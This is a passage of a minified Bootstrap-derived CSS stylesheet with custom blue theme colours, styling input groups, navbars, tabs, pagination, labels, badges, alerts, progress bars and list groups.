  603. .input-group .form-control,.input-group-addon,.input-group-btn{display:table-cell}
  604. .input-group .form-control:not(:first-child):not(:last-child),.input-group-addon:not(:first-child):not(:last-child),.input-group-btn:not(:first-child):not(:last-child){border-radius:0}
  605. .input-group-addon,.input-group-btn{width:1%;white-space:nowrap;vertical-align:middle}
  606. .input-group-addon{padding:6px 12px;font-size:14px;font-weight:400;line-height:1;color:#000;text-align:center;background-color:#eee;border:1px solid #ccc;border-radius:4px}
  607. .input-group-addon.input-sm{padding:5px 10px;font-size:12px;border-radius:3px}
  608. .input-group-addon.input-lg{padding:10px 16px;font-size:18px;border-radius:6px}
  609. .input-group-addon input[type=checkbox],.input-group-addon input[type=radio]{margin-top:0}
  610. .input-group .form-control:first-child,.input-group-addon:first-child,.input-group-btn:first-child>.btn,.input-group-btn:first-child>.btn-group>.btn,.input-group-btn:first-child>.dropdown-toggle,.input-group-btn:last-child>.btn-group:not(:last-child)>.btn,.input-group-btn:last-child>.btn:not(:last-child):not(.dropdown-toggle){border-bottom-right-radius:0;border-top-right-radius:0}
  611. .input-group-addon:first-child{border-right:0}
  612. .input-group .form-control:last-child,.input-group-addon:last-child,.input-group-btn:first-child>.btn-group:not(:first-child)>.btn,.input-group-btn:first-child>.btn:not(:first-child),.input-group-btn:last-child>.btn,.input-group-btn:last-child>.btn-group>.btn,.input-group-btn:last-child>.dropdown-toggle{border-bottom-left-radius:0;border-top-left-radius:0}
  613. .input-group-addon:last-child{border-left:0}
  614. .input-group-btn{position:relative;font-size:0;white-space:nowrap}
  615. .input-group-btn>.btn{position:relative}
  616. .input-group-btn>.btn+.btn{margin-left:-1px}
  617. .input-group-btn>.btn:active,.input-group-btn>.btn:focus,.input-group-btn>.btn:hover{z-index:2}
  618. .input-group-btn:first-child>.btn,.input-group-btn:first-child>.btn-group{margin-right:-1px}
  619. .input-group-btn:last-child>.btn,.input-group-btn:last-child>.btn-group{margin-left:-1px}
  620. .nav{margin-bottom:0;padding-left:0;list-style:none}
  621. .nav>li{position:relative;display:block}
  622. .nav>li>a{position:relative;display:block;padding:10px 15px}
  623. .nav>li>a:focus,.nav>li>a:hover{text-decoration:none;background-color:#eee}
  624. .nav>li.disabled>a{color:#999}
  625. .nav>li.disabled>a:focus,.nav>li.disabled>a:hover{color:#999;text-decoration:none;background-color:transparent;cursor:not-allowed}
  626. .nav .open>a,.nav .open>a:focus,.nav .open>a:hover{background-color:#eee;border-color:#3a6d99}
  627. .nav .nav-divider{height:1px;margin:9px 0;overflow:hidden;background-color:#e5e5e5}
  628. .nav>li>a>img{max-width:none}
  629. .nav-tabs{border-bottom:1px solid #ddd}
  630. .nav-tabs>li{float:left;margin-bottom:-1px}
  631. .nav-tabs>li>a{margin-right:2px;line-height:1.42857143;border:1px solid transparent;border-radius:4px 4px 0 0}
  632. .nav-tabs>li>a:hover{border-color:#eee #eee #ddd}
  633. .nav-tabs>li.active>a,.nav-tabs>li.active>a:focus,.nav-tabs>li.active>a:hover{color:#555;background-color:#fff;border:1px solid #ddd;border-bottom-color:transparent;cursor:default}
  634. .nav-tabs.nav-justified{width:100%;border-bottom:0}
  635. .nav-tabs.nav-justified>li{float:none}
  636. .nav-tabs.nav-justified>li>a{text-align:center;margin-bottom:5px}
  637. .nav-tabs.nav-justified>.dropdown .dropdown-menu{top:auto;left:auto}
  638. @media (min-width:768px){.nav-tabs.nav-justified>li{display:table-cell;width:1%}
  639. .nav-tabs.nav-justified>li>a{margin-bottom:0}}
  640. .nav-tabs.nav-justified>li>a{margin-right:0;border-radius:4px}
  641. .nav-tabs.nav-justified>.active>a,.nav-tabs.nav-justified>.active>a:focus,.nav-tabs.nav-justified>.active>a:hover{border:1px solid #ddd}
  642. @media (min-width:768px){.nav-tabs.nav-justified>li>a{border-bottom:1px solid #ddd;border-radius:4px 4px 0 0}
  643. .nav-tabs.nav-justified>.active>a,.nav-tabs.nav-justified>.active>a:focus,.nav-tabs.nav-justified>.active>a:hover{border-bottom-color:#fff}}
  644. .nav-pills>li{float:left}
  645. .nav-pills>li>a{border-radius:4px}
  646. .nav-pills>li+li{margin-left:2px}
  647. .nav-pills>li.active>a,.nav-pills>li.active>a:focus,.nav-pills>li.active>a:hover{color:#fff;background-color:#5d8db3}
  648. .nav-stacked>li{float:none}
  649. .nav-stacked>li+li{margin-top:2px;margin-left:0}
  650. .nav-justified{width:100%}
  651. .nav-justified>li{float:none}
  652. .nav-justified>li>a{text-align:center;margin-bottom:5px}
  653. .nav-justified>.dropdown .dropdown-menu{top:auto;left:auto}
  654. @media (min-width:768px){.nav-justified>li{display:table-cell;width:1%}
  655. .nav-justified>li>a{margin-bottom:0}}
  656. .nav-tabs-justified{border-bottom:0}
  657. .nav-tabs-justified>li>a{margin-right:0;border-radius:4px}
  658. .nav-tabs-justified>.active>a,.nav-tabs-justified>.active>a:focus,.nav-tabs-justified>.active>a:hover{border:1px solid #ddd}
  659. @media (min-width:768px){.nav-tabs-justified>li>a{border-bottom:1px solid #ddd;border-radius:4px 4px 0 0}
  660. .nav-tabs-justified>.active>a,.nav-tabs-justified>.active>a:focus,.nav-tabs-justified>.active>a:hover{border-bottom-color:#fff}}
  661. .tab-content>.tab-pane{display:none}
  662. .tab-content>.active{display:block}
  663. .nav-tabs .dropdown-menu{margin-top:-1px;border-top-right-radius:0;border-top-left-radius:0}
  664. .navbar{position:relative;min-height:44px;margin-bottom:20px;border:1px solid transparent}
  665. @media (min-width:480px){.navbar{border-radius:4px}}
  666. @media (min-width:480px){.navbar-header{float:left}}
  667. .navbar-collapse{overflow-x:visible;padding-right:0;padding-left:0;border-top:1px solid transparent;box-shadow:inset 0 1px 0 rgba(255,255,255,.1);-webkit-overflow-scrolling:touch}
  668. .navbar-collapse.in{overflow-y:auto}
  669. @media (min-width:480px){.navbar-collapse{width:auto;border-top:0;box-shadow:none}
  670. .navbar-collapse.collapse{display:block!important;height:auto!important;padding-bottom:0;overflow:visible!important}
  671. .navbar-collapse.in{overflow-y:visible}
  672. .navbar-fixed-bottom .navbar-collapse,.navbar-fixed-top .navbar-collapse,.navbar-static-top .navbar-collapse{padding-left:0;padding-right:0}}
  673. .navbar-fixed-bottom .navbar-collapse,.navbar-fixed-top .navbar-collapse{max-height:340px}
  674. @media (max-width:480px) and (orientation:landscape){.navbar-fixed-bottom .navbar-collapse,.navbar-fixed-top .navbar-collapse{max-height:200px}}
  675. .container-fluid>.navbar-collapse,.container-fluid>.navbar-header,.container>.navbar-collapse,.container>.navbar-header{margin-right:0;margin-left:0}
  676. @media (min-width:480px){.container-fluid>.navbar-collapse,.container-fluid>.navbar-header,.container>.navbar-collapse,.container>.navbar-header{margin-right:0;margin-left:0}}
  677. .navbar-static-top{z-index:1000;border-width:0 0 1px}
  678. @media (min-width:480px){.navbar-static-top{border-radius:0}}
  679. .navbar-fixed-bottom,.navbar-fixed-top{position:fixed;right:0;left:0;z-index:1030;-webkit-transform:translate3d(0,0,0);transform:translate3d(0,0,0)}
  680. @media (min-width:480px){.navbar-fixed-bottom,.navbar-fixed-top{border-radius:0}}
  681. .navbar-fixed-top{top:0;border-width:0 0 1px}
  682. .navbar-fixed-bottom{bottom:0;margin-bottom:0;border-width:1px 0 0}
  683. .navbar-brand{float:left;padding:12px 0;font-size:18px;line-height:20px;height:44px}
  684. .navbar-brand:focus,.navbar-brand:hover{text-decoration:none}
  685. @media (min-width:480px){.navbar>.container .navbar-brand,.navbar>.container-fluid .navbar-brand{margin-left:0}}
  686. .navbar-toggle{position:relative;float:right;margin-right:0;padding:9px 10px;margin-top:5px;margin-bottom:5px;background-color:transparent;background-image:none;border:1px solid transparent;border-radius:4px}
  687. .navbar-toggle:focus{outline:0}
  688. .navbar-toggle .icon-bar{display:block;width:22px;height:2px;border-radius:1px}
  689. .navbar-toggle .icon-bar+.icon-bar{margin-top:4px}
  690. @media (min-width:480px){.navbar-toggle{display:none}}
  691. .navbar-nav{margin:6px 0}
  692. .navbar-nav>li>a{padding-top:10px;padding-bottom:10px;line-height:20px}
  693. @media (max-width:479px){.navbar-nav .open .dropdown-menu{position:static;float:none;width:auto;margin-top:0;background-color:transparent;border:0;box-shadow:none}
  694. .navbar-nav .open .dropdown-menu .dropdown-header,.navbar-nav .open .dropdown-menu>li>a{padding:5px 15px 5px 25px}
  695. .navbar-nav .open .dropdown-menu>li>a{line-height:20px}
  696. .navbar-nav .open .dropdown-menu>li>a:focus,.navbar-nav .open .dropdown-menu>li>a:hover{background-image:none}}
  697. @media (min-width:480px){.navbar-nav{float:left;margin:0}
  698. .navbar-nav>li{float:left}
  699. .navbar-nav>li>a{padding-top:12px;padding-bottom:12px}
  700. .navbar-nav.navbar-right:last-child{margin-right:0}}
  701. @media (min-width:480px){.navbar-left{float:left!important}
  702. .navbar-right{float:right!important}}
  703. .navbar-form{margin:5px 0;padding:10px 0;border-top:1px solid transparent;border-bottom:1px solid transparent;-webkit-box-shadow:inset 0 1px 0 rgba(255,255,255,.1),0 1px 0 rgba(255,255,255,.1);box-shadow:inset 0 1px 0 rgba(255,255,255,.1),0 1px 0 rgba(255,255,255,.1)}
  704. @media (min-width:768px){.navbar-form .form-group{display:inline-block;margin-bottom:0;vertical-align:middle}
  705. .navbar-form .form-control{display:inline-block;width:auto;vertical-align:middle}
  706. .navbar-form .input-group{display:inline-table;vertical-align:middle}
  707. .navbar-form .input-group .form-control,.navbar-form .input-group .input-group-addon,.navbar-form .input-group .input-group-btn{width:auto}
  708. .navbar-form .input-group>.form-control{width:100%}
  709. .navbar-form .control-label{margin-bottom:0;vertical-align:middle}
  710. .navbar-form .checkbox,.navbar-form .radio{display:inline-block;margin-top:0;margin-bottom:0;vertical-align:middle}
  711. .navbar-form .checkbox label,.navbar-form .radio label{padding-left:0}
  712. .navbar-form .checkbox input[type=checkbox],.navbar-form .radio input[type=radio]{position:relative;margin-left:0}
  713. .navbar-form .has-feedback .form-control-feedback{top:0}}
  714. @media (max-width:479px){.navbar-form .form-group{margin-bottom:5px}}
  715. @media (min-width:480px){.navbar-form{width:auto;border:0;margin-left:0;margin-right:0;padding-top:0;padding-bottom:0;-webkit-box-shadow:none;box-shadow:none}
  716. .navbar-form.navbar-right:last-child{margin-right:0}}
  717. .navbar-nav>li>.dropdown-menu{margin-top:0;border-top-right-radius:0;border-top-left-radius:0}
  718. .navbar-fixed-bottom .navbar-nav>li>.dropdown-menu{border-bottom-right-radius:0;border-bottom-left-radius:0}
  719. .navbar-btn{margin-top:5px;margin-bottom:5px}
  720. .navbar-btn.btn-sm{margin-top:7px;margin-bottom:7px}
  721. .navbar-btn.btn-xs{margin-top:11px;margin-bottom:11px}
  722. .navbar-text{margin-top:12px;margin-bottom:12px}
  723. @media (min-width:480px){.navbar-text{float:left;margin-left:0;margin-right:0}
  724. .navbar-text.navbar-right:last-child{margin-right:0}}
  725. .navbar-default{background-color:#f8f8f8;border-color:#e7e7e7}
  726. .navbar-default .navbar-brand{color:#777}
  727. .navbar-default .navbar-brand:focus,.navbar-default .navbar-brand:hover{color:#5e5e5e;background-color:transparent}
  728. .navbar-default .navbar-nav>li>a,.navbar-default .navbar-text{color:#777}
  729. .navbar-default .navbar-nav>li>a:focus,.navbar-default .navbar-nav>li>a:hover{color:#333;background-color:transparent}
  730. .navbar-default .navbar-nav>.active>a,.navbar-default .navbar-nav>.active>a:focus,.navbar-default .navbar-nav>.active>a:hover{color:#555;background-color:#e7e7e7}
  731. .navbar-default .navbar-nav>.disabled>a,.navbar-default .navbar-nav>.disabled>a:focus,.navbar-default .navbar-nav>.disabled>a:hover{color:#ccc;background-color:transparent}
  732. .navbar-default .navbar-toggle{border-color:#ddd}
  733. .navbar-default .navbar-toggle:focus,.navbar-default .navbar-toggle:hover{background-color:#ddd}
  734. .navbar-default .navbar-toggle .icon-bar{background-color:#888}
  735. .navbar-default .navbar-collapse,.navbar-default .navbar-form{border-color:#e7e7e7}
  736. .navbar-default .navbar-nav>.open>a,.navbar-default .navbar-nav>.open>a:focus,.navbar-default .navbar-nav>.open>a:hover{background-color:#e7e7e7;color:#555}
  737. @media (max-width:479px){.navbar-default .navbar-nav .open .dropdown-menu>li>a{color:#777}
  738. .navbar-default .navbar-nav .open .dropdown-menu>li>a:focus,.navbar-default .navbar-nav .open .dropdown-menu>li>a:hover{color:#333;background-color:transparent}
  739. .navbar-default .navbar-nav .open .dropdown-menu>.active>a,.navbar-default .navbar-nav .open .dropdown-menu>.active>a:focus,.navbar-default .navbar-nav .open .dropdown-menu>.active>a:hover{color:#555;background-color:#e7e7e7}
  740. .navbar-default .navbar-nav .open .dropdown-menu>.disabled>a,.navbar-default .navbar-nav .open .dropdown-menu>.disabled>a:focus,.navbar-default .navbar-nav .open .dropdown-menu>.disabled>a:hover{color:#ccc;background-color:transparent}}
  741. .navbar-default .navbar-link{color:#777}
  742. .navbar-default .navbar-link:hover{color:#333}
  743. .navbar-default .btn-link{color:#777}
  744. .navbar-default .btn-link:focus,.navbar-default .btn-link:hover{color:#333}
  745. .navbar-default .btn-link[disabled]:focus,.navbar-default .btn-link[disabled]:hover,fieldset[disabled] .navbar-default .btn-link:focus,fieldset[disabled] .navbar-default .btn-link:hover{color:#ccc}
  746. .navbar-inverse{background-color:#497495;border-color:#385973}
  747. .navbar-inverse .navbar-brand{color:#999}
  748. .navbar-inverse .navbar-brand:focus,.navbar-inverse .navbar-brand:hover{color:#fff;background-color:transparent}
  749. .navbar-inverse .navbar-nav>li>a,.navbar-inverse .navbar-text{color:#999}
  750. .navbar-inverse .navbar-nav>li>a:focus,.navbar-inverse .navbar-nav>li>a:hover{color:#fff;background-color:transparent}
  751. .navbar-inverse .navbar-nav>.active>a,.navbar-inverse .navbar-nav>.active>a:focus,.navbar-inverse .navbar-nav>.active>a:hover{color:#fff;background-color:#385973}
  752. .navbar-inverse .navbar-nav>.disabled>a,.navbar-inverse .navbar-nav>.disabled>a:focus,.navbar-inverse .navbar-nav>.disabled>a:hover{color:#444;background-color:transparent}
  753. .navbar-inverse .navbar-toggle{border-color:#333}
  754. .navbar-inverse .navbar-toggle:focus,.navbar-inverse .navbar-toggle:hover{background-color:#333}
  755. .navbar-inverse .navbar-toggle .icon-bar{background-color:#fff}
  756. .navbar-inverse .navbar-collapse,.navbar-inverse .navbar-form{border-color:#3d617d}
  757. .navbar-inverse .navbar-nav>.open>a,.navbar-inverse .navbar-nav>.open>a:focus,.navbar-inverse .navbar-nav>.open>a:hover{background-color:#385973;color:#fff}
  758. @media (max-width:479px){.navbar-inverse .navbar-nav .open .dropdown-menu>.dropdown-header{border-color:#385973}
  759. .navbar-inverse .navbar-nav .open .dropdown-menu .divider{background-color:#385973}
  760. .navbar-inverse .navbar-nav .open .dropdown-menu>li>a{color:#999}
  761. .navbar-inverse .navbar-nav .open .dropdown-menu>li>a:focus,.navbar-inverse .navbar-nav .open .dropdown-menu>li>a:hover{color:#fff;background-color:transparent}
  762. .navbar-inverse .navbar-nav .open .dropdown-menu>.active>a,.navbar-inverse .navbar-nav .open .dropdown-menu>.active>a:focus,.navbar-inverse .navbar-nav .open .dropdown-menu>.active>a:hover{color:#fff;background-color:#385973}
  763. .navbar-inverse .navbar-nav .open .dropdown-menu>.disabled>a,.navbar-inverse .navbar-nav .open .dropdown-menu>.disabled>a:focus,.navbar-inverse .navbar-nav .open .dropdown-menu>.disabled>a:hover{color:#444;background-color:transparent}}
  764. .navbar-inverse .navbar-link{color:#999}
  765. .navbar-inverse .navbar-link:hover{color:#fff}
  766. .navbar-inverse .btn-link{color:#999}
  767. .navbar-inverse .btn-link:focus,.navbar-inverse .btn-link:hover{color:#fff}
  768. .navbar-inverse .btn-link[disabled]:focus,.navbar-inverse .btn-link[disabled]:hover,fieldset[disabled] .navbar-inverse .btn-link:focus,fieldset[disabled] .navbar-inverse .btn-link:hover{color:#444}
  769. .breadcrumb{padding:8px 15px;margin-bottom:20px;list-style:none;background-color:#f5f5f5;border-radius:4px}
  770. .breadcrumb>li{display:inline-block}
  771. .breadcrumb>li+li:before{content:"/\00a0";padding:0 5px;color:#ccc}
  772. .breadcrumb>.active{color:#999}
  773. .pagination{display:inline-block;padding-left:0;margin:20px 0;border-radius:4px}
  774. .pagination>li{display:inline}
  775. .pagination>li>a,.pagination>li>span{position:relative;float:left;padding:6px 12px;line-height:1.42857143;text-decoration:none;color:#3a6d99;background-color:#fff;border:1px solid #ddd;margin-left:-1px}
  776. .pagination>li:first-child>a,.pagination>li:first-child>span{margin-left:0;border-bottom-left-radius:4px;border-top-left-radius:4px}
  777. .pagination>li:last-child>a,.pagination>li:last-child>span{border-bottom-right-radius:4px;border-top-right-radius:4px}
  778. .pagination>li>a:focus,.pagination>li>a:hover,.pagination>li>span:focus,.pagination>li>span:hover{color:#3a6d99;background-color:#eee;border-color:#ddd}
  779. .pagination>.active>a,.pagination>.active>a:focus,.pagination>.active>a:hover,.pagination>.active>span,.pagination>.active>span:focus,.pagination>.active>span:hover{z-index:2;color:#fff;background-color:#5d8db3;border-color:#5d8db3;cursor:default}
  780. .pagination>.disabled>a,.pagination>.disabled>a:focus,.pagination>.disabled>a:hover,.pagination>.disabled>span,.pagination>.disabled>span:focus,.pagination>.disabled>span:hover{color:#999;background-color:#fff;border-color:#ddd;cursor:not-allowed}
  781. .pagination-lg>li>a,.pagination-lg>li>span{padding:10px 16px;font-size:18px}
  782. .pagination-lg>li:first-child>a,.pagination-lg>li:first-child>span{border-bottom-left-radius:6px;border-top-left-radius:6px}
  783. .pagination-lg>li:last-child>a,.pagination-lg>li:last-child>span{border-bottom-right-radius:6px;border-top-right-radius:6px}
  784. .pagination-sm>li>a,.pagination-sm>li>span{padding:5px 10px;font-size:12px}
  785. .pagination-sm>li:first-child>a,.pagination-sm>li:first-child>span{border-bottom-left-radius:3px;border-top-left-radius:3px}
  786. .pagination-sm>li:last-child>a,.pagination-sm>li:last-child>span{border-bottom-right-radius:3px;border-top-right-radius:3px}
  787. .pager{padding-left:0;margin:20px 0;list-style:none;text-align:center}
  788. .pager li{display:inline}
  789. .pager li>a,.pager li>span{display:inline-block;padding:5px 14px;background-color:#fff;border:1px solid #ddd;border-radius:15px}
  790. .pager li>a:focus,.pager li>a:hover{text-decoration:none;background-color:#eee}
  791. .pager .next>a,.pager .next>span{float:right}
  792. .pager .previous>a,.pager .previous>span{float:left}
  793. .pager .disabled>a,.pager .disabled>a:focus,.pager .disabled>a:hover,.pager .disabled>span{color:#999;background-color:#fff;cursor:not-allowed}
  794. .label{display:inline;padding:.2em .6em .3em;font-size:75%;font-weight:700;line-height:1;color:#fff;text-align:center;white-space:nowrap;vertical-align:baseline;border-radius:.25em}
  795. a.label:focus,a.label:hover{color:#fff;text-decoration:none;cursor:pointer}
  796. .label:empty{display:none}
  797. .btn .label{position:relative;top:-1px}
  798. .label-default{background-color:#999}
  799. .label-default[href]:focus,.label-default[href]:hover{background-color:grey}
  800. .label-primary{background-color:#5d8db3}
  801. .label-primary[href]:focus,.label-primary[href]:hover{background-color:#477396}
  802. .label-success{background-color:#6ac065}
  803. .label-success[href]:focus,.label-success[href]:hover{background-color:#4cac46}
  804. .label-info{background-color:#5bc0de}
  805. .label-info[href]:focus,.label-info[href]:hover{background-color:#31b0d5}
  806. .label-warning{background-color:#f0ad4e}
  807. .label-warning[href]:focus,.label-warning[href]:hover{background-color:#ec971f}
  808. .label-danger{background-color:#c05f5a}
  809. .label-danger[href]:focus,.label-danger[href]:hover{background-color:#a74540}
  810. .badge{display:inline-block;min-width:10px;padding:3px 7px;font-size:12px;font-weight:700;color:#fff;line-height:1;vertical-align:baseline;white-space:nowrap;text-align:center;background-color:#999;border-radius:10px}
  811. .badge:empty{display:none}
  812. .btn .badge{position:relative;top:-1px}
  813. .btn-xs .badge{top:0;padding:1px 5px}
  814. a.badge:focus,a.badge:hover{color:#fff;text-decoration:none;cursor:pointer}
  815. .nav-pills>.active>a>.badge,a.list-group-item.active>.badge{color:#3a6d99;background-color:#fff}
  816. .nav-pills>li>a>.badge{margin-left:3px}
  817. .jumbotron{padding:30px;margin-bottom:30px;color:inherit;background-color:#eee}
  818. .jumbotron .h1,.jumbotron h1{color:inherit}
  819. .jumbotron p{margin-bottom:15px;font-size:21px;font-weight:200}
  820. .jumbotron>hr{border-top-color:#d5d5d5}
  821. .container .jumbotron{border-radius:6px}
  822. .jumbotron .container{max-width:100%}
  823. @media screen and (min-width:768px){.jumbotron{padding-top:48px;padding-bottom:48px}
  824. .container .jumbotron{padding-left:60px;padding-right:60px}
  825. .jumbotron .h1,.jumbotron h1{font-size:63px}}
  826. .thumbnail{display:block;padding:4px;margin-bottom:20px;line-height:1.42857143;background-color:#fff;border:1px solid #ddd;border-radius:4px;-webkit-transition:all .2s ease-in-out;-o-transition:all .2s ease-in-out;transition:all .2s ease-in-out}
  827. .thumbnail a>img,.thumbnail>img{margin-left:auto;margin-right:auto}
  828. a.thumbnail.active,a.thumbnail:focus,a.thumbnail:hover{border-color:#3a6d99}
  829. .thumbnail .caption{padding:9px;color:#000}
  830. .alert{padding:15px;margin-bottom:20px;border:1px solid transparent;border-radius:4px}
  831. .alert h4{margin-top:0;color:inherit}
  832. .alert .alert-link{font-weight:700}
  833. .alert>p,.alert>ul{margin-bottom:0}
  834. .alert>p+p{margin-top:5px}
  835. .alert-dismissable,.alert-dismissible{padding-right:35px}
  836. .alert-dismissable .close,.alert-dismissible .close{position:relative;top:-2px;right:-21px;color:inherit}
  837. .alert-success{background-color:#dff0d8;border-color:#d6e9c6;color:#3c763d}
  838. .alert-success hr{border-top-color:#c9e2b3}
  839. .alert-success .alert-link{color:#2b542c}
  840. .alert-info{background-color:#d9edf7;border-color:#bce8f1;color:#31708f}
  841. .alert-info hr{border-top-color:#a6e1ec}
  842. .alert-info .alert-link{color:#245269}
  843. .alert-warning{background-color:#fcf8e3;border-color:#faebcc;color:#8a6d3b}
  844. .alert-warning hr{border-top-color:#f7e1b5}
  845. .alert-warning .alert-link{color:#66512c}
  846. .alert-danger{background-color:#f2dede;border-color:#ebccd1;color:#a94442}
  847. .alert-danger hr{border-top-color:#e4b9c0}
  848. .alert-danger .alert-link{color:#843534}
  849. @-webkit-keyframes progress-bar-stripes{from{background-position:40px 0}
  850. to{background-position:0 0}}
  851. @keyframes progress-bar-stripes{from{background-position:40px 0}
  852. to{background-position:0 0}}
  853. .progress{overflow:hidden;height:20px;margin-bottom:20px;background-color:#f5f5f5;border-radius:4px;-webkit-box-shadow:inset 0 1px 2px rgba(0,0,0,.1);box-shadow:inset 0 1px 2px rgba(0,0,0,.1)}
  854. .progress-bar{float:left;width:0;height:100%;font-size:12px;line-height:20px;color:#fff;text-align:center;background-color:#5d8db3;-webkit-box-shadow:inset 0 -1px 0 rgba(0,0,0,.15);box-shadow:inset 0 -1px 0 rgba(0,0,0,.15);-webkit-transition:width .6s ease;-o-transition:width .6s ease;transition:width .6s ease}
  855. .progress-bar-striped,.progress-striped .progress-bar{background-image:-webkit-linear-gradient(45deg,rgba(255,255,255,.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,.15) 50%,rgba(255,255,255,.15) 75%,transparent 75%,transparent);background-image:-o-linear-gradient(45deg,rgba(255,255,255,.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,.15) 50%,rgba(255,255,255,.15) 75%,transparent 75%,transparent);background-image:linear-gradient(45deg,rgba(255,255,255,.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,.15) 50%,rgba(255,255,255,.15) 75%,transparent 75%,transparent);background-size:40px 40px}
  856. .progress-bar.active,.progress.active .progress-bar{-webkit-animation:progress-bar-stripes 2s linear infinite;-o-animation:progress-bar-stripes 2s linear infinite;animation:progress-bar-stripes 2s linear infinite}
  857. .progress-bar[aria-valuenow="1"],.progress-bar[aria-valuenow="2"]{min-width:30px}
  858. .progress-bar[aria-valuenow="0"]{color:#999;min-width:30px;background-color:transparent;background-image:none;box-shadow:none}
  859. .progress-bar-success{background-color:#6ac065}
  860. .progress-striped .progress-bar-success{background-image:-webkit-linear-gradient(45deg,rgba(255,255,255,.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,.15) 50%,rgba(255,255,255,.15) 75%,transparent 75%,transparent);background-image:-o-linear-gradient(45deg,rgba(255,255,255,.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,.15) 50%,rgba(255,255,255,.15) 75%,transparent 75%,transparent);background-image:linear-gradient(45deg,rgba(255,255,255,.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,.15) 50%,rgba(255,255,255,.15) 75%,transparent 75%,transparent)}
  861. .progress-bar-info{background-color:#5bc0de}
  862. .progress-striped .progress-bar-info{background-image:-webkit-linear-gradient(45deg,rgba(255,255,255,.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,.15) 50%,rgba(255,255,255,.15) 75%,transparent 75%,transparent);background-image:-o-linear-gradient(45deg,rgba(255,255,255,.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,.15) 50%,rgba(255,255,255,.15) 75%,transparent 75%,transparent);background-image:linear-gradient(45deg,rgba(255,255,255,.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,.15) 50%,rgba(255,255,255,.15) 75%,transparent 75%,transparent)}
  863. .progress-bar-warning{background-color:#f0ad4e}
  864. .progress-striped .progress-bar-warning{background-image:-webkit-linear-gradient(45deg,rgba(255,255,255,.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,.15) 50%,rgba(255,255,255,.15) 75%,transparent 75%,transparent);background-image:-o-linear-gradient(45deg,rgba(255,255,255,.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,.15) 50%,rgba(255,255,255,.15) 75%,transparent 75%,transparent);background-image:linear-gradient(45deg,rgba(255,255,255,.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,.15) 50%,rgba(255,255,255,.15) 75%,transparent 75%,transparent)}
  865. .progress-bar-danger{background-color:#c05f5a}
  866. .progress-striped .progress-bar-danger{background-image:-webkit-linear-gradient(45deg,rgba(255,255,255,.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,.15) 50%,rgba(255,255,255,.15) 75%,transparent 75%,transparent);background-image:-o-linear-gradient(45deg,rgba(255,255,255,.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,.15) 50%,rgba(255,255,255,.15) 75%,transparent 75%,transparent);background-image:linear-gradient(45deg,rgba(255,255,255,.15) 25%,transparent 25%,transparent 50%,rgba(255,255,255,.15) 50%,rgba(255,255,255,.15) 75%,transparent 75%,transparent)}
  867. .media,.media-body{overflow:hidden;zoom:1}
  868. .media,.media .media{margin-top:15px}
  869. .media:first-child{margin-top:0}
  870. .media-object{display:block}
  871. .media-heading{margin:0 0 5px}
  872. .media>.pull-left{margin-right:10px}
  873. .media>.pull-right{margin-left:10px}
  874. .media-list{padding-left:0;list-style:none}
  875. .list-group{margin-bottom:20px;padding-left:0}
  876. .list-group-item{position:relative;display:block;padding:10px 15px;margin-bottom:-1px;background-color:#fff;border:1px solid #ddd}
  877. .list-group-item:first-child{border-top-right-radius:4px;border-top-left-radius:4px}
  878. .list-group-item:last-child{margin-bottom:0;border-bottom-right-radius:4px;border-bottom-left-radius:4px}
  879. .list-group-item>.badge{float:right}
  880. .list-group-item>.badge+.badge{margin-right:5px}
  881. a.list-group-item{color:#555}
  882. a.list-group-item .list-group-item-heading{color:#333}
  883. a.list-group-item:focus,a.list-group-item:hover{text-decoration:none;color:#555;background-color:#f5f5f5}
  884. .list-group-item.disabled,.list-group-item.disabled:focus,.list-group-item.disabled:hover{background-color:#eee;color:#999}
  885. .list-group-item.disabled .list-group-item-heading,.list-group-item.disabled:focus .list-group-item-heading,.list-group-item.disabled:hover .list-group-item-heading{color:inherit}
  886. .list-group-item.disabled .list-group-item-text,.list-group-item.disabled:focus .list-group-item-text,.list-group-item.disabled:hover .list-group-item-text{color:#999}
  887. .list-group-item.active,.list-group-item.active:focus,.list-group-item.active:hover{z-index:2;color:#fff;background-color:#5d8db3;border-color:#5d8db3}
  888. .list-group-item.active .list-group-item-heading,.list-group-item.active .list-group-item-heading>.small,.list-group-item.active .list-group-item-heading>small,.list-group-item.active:focus .list-group-item-heading,.list-group-item.active:focus .list-group-item-heading>.small,.list-group-item.active:focus .list-group-item-heading>small,.list-group-item.active:hover .list-group-item-heading,.list-group-item.active:hover .list-group-item-heading>.small,.list-group-item.active:hover .list-group-item-heading>small{color:inherit}
  889. .list-group-item.active .list-group-item-text,.list-group-item.active:focus .list-group-item-text,.list-group-item.active:hover .list-group-item-text{color:#e8eff4}
  890. .list-group-item-success{color:#3c763d;background-color:#dff0d8}
  891. a.list-group-item-success{color:#3c763d}
  892. a.list-group-item-success .list-group-item-heading{color:inherit}
  893. a.list-group-item-success:focus,a.list-group-item-success:hover{color:#3c763d;background-color:#d0e9c6}
  894. a.list-group-item-success.active,a.list-group-item-success.active:focus,a.list-group-item-success.active:hover{color:#fff;background-color:#3c763d;border-color:#3c763d}
  895. .list-group-item-info{color:#31708f;background-color:#d9edf7}
  896. a.list-group-item-info{color:#31708f}
  897. a.list-group-item-info .list-group-item-heading{color:inherit}
  898. a.list-group-item-info:focus,a.list-group-item-info:hover{color:#31708f;background-color:#c4e3f3}
  899. a.list-group-item-info.active,a.list-group-item-info.active:focus,a.list-group-item-info.active:hover{color:#fff;background-color:#31708f;border-color:#31708f}
  900. .list-group-item-warning{color:#8a6d3b;background-color:#fcf8e3}
  901. a.list-group-item-warning{color:#8a6d3b}
  902. a.list-group-item-warning .list-group-item-heading{color:inherit}
  903. a.list-group-item-warning:focus,a.list-group-item-warning:hover{color:#8a6d3b;background-color:#faf2cc}
